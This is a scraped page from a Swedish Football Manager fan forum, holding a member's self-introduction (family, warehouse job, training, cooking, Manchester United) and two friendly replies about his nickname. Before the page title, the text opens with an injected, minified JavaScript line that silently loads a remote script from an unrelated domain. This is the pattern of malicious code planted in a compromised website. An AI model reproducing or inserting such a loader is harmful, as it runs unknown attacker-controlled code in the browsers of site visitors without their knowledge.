;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lappe – Hej forumet! – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

Lappe

4 Inlägg
3 Users
12 Likes
414 Visningar
(@lappe)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
Topic starter  

Måste såklart regga mig på nya sidan även jag.

”Känd” som lappe, eller lappeeeee. Heter egentligen Lars, kallas för Lasse. Fyller 29 i november. 

2018 gifte jag mig efter ett 9 år långt förhållande. Det gick dock åt fanders och sedan 1 år tillbaka bor jag i Vällingby efter 7 år i Uppsala. Där bor jag med min sambo Madde och min helt underbara 10-åriga bonusdotter Isa. Min 3-åriga finska lapphund Bailey finns såklart också med i bilden.

Har jobbat som lagerarbetare på Ica i över 5 år. Är sedan 2 år tillbaka kvalitetsansvarig för intaget av frukt och grönt och jag trivs som handen i handsken.

Kliver upp 03:30 varje dag och cyklar de där 9+ kilometrarna enkel resa till jobbet. Jobbar 05-14 å cyklar gladeligen hem igen. 

Har på sistone intresserat mig mycket för träning och jag älskar att ha ett aktivt liv med långa härliga promenader och diverse uteaktiviteter på min fritid. Utöver det så tränar jag och min sambo 5-6 gånger i veckan. Jag har väldigt svårt att sitta still!

Tiden som blir över läggs på matlagning. Lamm är favoriten och en lammgryta med starka kryddor och utstickande smak är svårslaget om ni frågar mig.

Manchester United är det enda laget i mitt hjärta. Har följt dem slaviskt sedan början av 00-talet.

Jag kommer förmodligen vara lika inaktiv här på forumet som jag varit de senaste åren. Men man kikar in då och då och frågan är om man någon gång kommer vara redo att släppa FMS helt och hållet. Även fast FM startas max en gång i halvåret nuförtiden.

Det var nog allt. Sprid kärlek. Inte hat.

 


   
Micke, trashbag, The Normal One and 1 people reacted
Citera
vicke231
(@vicke231)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 35
 

Lite färre "e" än vanligt. Kul att höra från dig igen!


   
Northwinds and Lappe reacted
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

Kul! Känns väldigt vuxet med endast ett e istället för flera. 

 

Skulle du vilja bli kallad Larsa istället för Lasse? Min far heter nämligen Lars och har haft samma diskussion med honom. Kallar ofta honom det han inte vill bli kallad. 


   
SvaraCitera
(@lappe)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
Topic starter  

@onkel-fester

Jag började ju nicka Lappe med endast ett E när det först begav sig här på fms, då var jag i tidiga tonåren.

Endast min mamma som kallar mig för Larsa, så jag är nog van med de flesta smeknamn man kan hitta på. Men gör gärna ett försök att förnedra mig med diverse smeknamn!


   
SvaraCitera
Share: